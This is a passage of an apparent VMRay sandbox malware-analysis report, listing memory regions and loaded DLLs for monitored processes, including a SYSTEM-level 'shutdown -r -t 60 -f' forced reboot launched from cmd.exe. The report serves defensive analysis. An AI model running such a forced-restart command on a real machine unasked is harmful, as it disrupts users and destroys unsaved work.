private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #14: shutdown.exe
0 0
»
Information Value
ID #14
File Name c:\windows\syswow64\shutdown.exe
Command Line shutdown -r -t 60 -f
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:04:54, Reason: Child Process
Unmonitor End Time: 00:04:55, Reason: Terminated by Timeout
Monitor Duration 00:00:01
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xb14
Parent PID 0x554 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x B34
0x 90C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000000f0000 0x000f0000 0x0012ffff Private Memory Readable, Writable True False False -
locale.nls 0x00130000 0x00196fff Memory Mapped File Readable False False False -
private_0x00000000001d0000 0x001d0000 0x0024ffff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x00577fff Pagefile Backed Memory Readable True False False -
shutdown.exe 0x00f90000 0x00f99fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x74270000 0x74277fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #15: ie4uinit.exe
0 0
»
Information Value
ID #15
File Name c:\windows\syswow64\ie4uinit.exe
Command Line "C:\Windows\SysWOW64\ie4uinit.exe" -ShowQLIcon
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:04:54, Reason: Child Process
Unmonitor End Time: 00:04:55, Reason: Terminated by Timeout
Monitor Duration 00:00:01
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x9a4
Parent PID 0xb08 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 978
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x000d0000 0x000d0fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000100000 0x00100000 0x0010ffff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False -
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f1fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x0023ffff Private Memory Readable, Writable True False False -
ie4uinit.exe 0x00260000 0x0028dfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000290000 0x00290000 0x00417fff Pagefile Backed Memory Readable True False False -
private_0x0000000000430000 0x00430000 0x004affff Private Memory Readable, Writable True False False -
pagefile_0x00000000004b0000 0x004b0000 0x00630fff Pagefile Backed Memory Readable True False False -
private_0x0000000000650000 0x00650000 0x0074ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000750000 0x00750000 0x01b4ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001b50000 0x01b50000 0x01e92fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001ea0000 0x01ea0000 0x02292fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000022a0000 0x022a0000 0x0237efff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02380000 0x0264efff Memory Mapped File Readable False False False -
private_0x0000000002650000 0x02650000 0x0274ffff Private Memory Readable, Writable True False False -
private_0x00000000027b0000 0x027b0000 0x027effff Private Memory Readable, Writable True False False -
private_0x0000000002900000 0x02900000 0x0293ffff Private Memory Readable, Writable True False False -
advpack.dll 0x73a50000 0x73a7dfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x73ac0000 0x73ac8fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x73c30000 0x73c6bfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x742d0000 0x743c4fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x743f0000 0x74410fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x74c90000 0x74ca1fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75290000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x75700000 0x75744fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x75860000 0x75886fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image